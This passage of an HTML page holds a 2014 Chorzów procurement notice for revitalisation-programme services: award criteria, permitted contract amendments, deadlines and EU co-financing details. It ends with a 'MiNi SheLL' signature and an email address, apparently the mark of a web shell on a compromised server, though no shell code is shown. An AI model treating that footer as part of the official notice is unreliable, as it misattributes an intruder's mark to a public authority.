8. W przypadku, gdy Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków zobowiązany jest w takiej sytuacji udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Jakość zawartości merytorycznej konspektu przedstawiającego sposób realizacji przedmiotu zamówienia - 50</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się zmiany postanowień umowy  na podstawie podpisanego  przez strony aneksu do umowy w zakresie:
a)Terminu wykonania umowy - np. w przypadku  opóźnienia w dostarczeniu programu rewitalizacji danego miasta,
b) Przedmiotu zamówienia - wprowadzenia usług zamiennych ( do poziomu  20  % wartości zamówienia ) wynikających z sytuacji awaryjnej,
c)Zmniejszenia wynagrodzenia - w przypadku zmniejszenia zakresu usług.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.chorzow.ee/bip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Chorzów, 41-500 Chorzów, Rynek 1, Biuro Zamówień Publicznych, pokój 237.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.03.2014 godzina 09:45, miejsce: Urząd Miasta Chorzów, 41-500 Chorzów, Rynek 1, Biuro Zamówień Publicznych, pokój 237.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn.:-Zintegrowane  podejście do problemów obszarów funkcjonalnych  na przykładzie Chorzowa, Rudy Śląskiej i Świętochłowic- realizowany jest w ramach współfinansowania środkami budżetu państwa ujętymi w części 34 -rozwój Regionalny, na finansowanie i współfinansowanie  działań  podejmowanych w ramach realizacji zadań  Instytucji Zarządzającej  Programem Operacyjnym  Pomoc Techniczna (POPT) w części dotyczącej projektów  realizowanych  przez Ministerstwo Rozwoju Regionalnego, z wyłączeniem środków na wynagrodzenia pracowników Ministerstwa, środków na wydatki związane z wdrożeniem, utrzymaniem oraz rozwojem infrastruktury i systemów teleinformatycznych  Ministerstwa oraz na wydatki związane z obsługą logistyczno-administracyjną, gospodarowaniem mieniem i zarządzaniem nieruchomościami pozostającymi w trwałym zarządzie Ministerstwa, środkami Europejskiego  Funduszu Rozwoju Regionalnego, będącymi w dyspozycji Ministra  Rozwoju Regionalnego, w ramach realizacji zadań Instytucji Zarządzającej  POPT, Projekt jest dofinansowany w 10 % z środków własnych miast: Chorzowa, Rudy Śląskiej i Świętochłowic zgodnie z treścią umowy nr DPT/BDG-II/POPT/90/13z dnia 16.07.2013 r. zawartej z Ministrem Rozwoju Regionalnego, a Miastem Chorzów..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com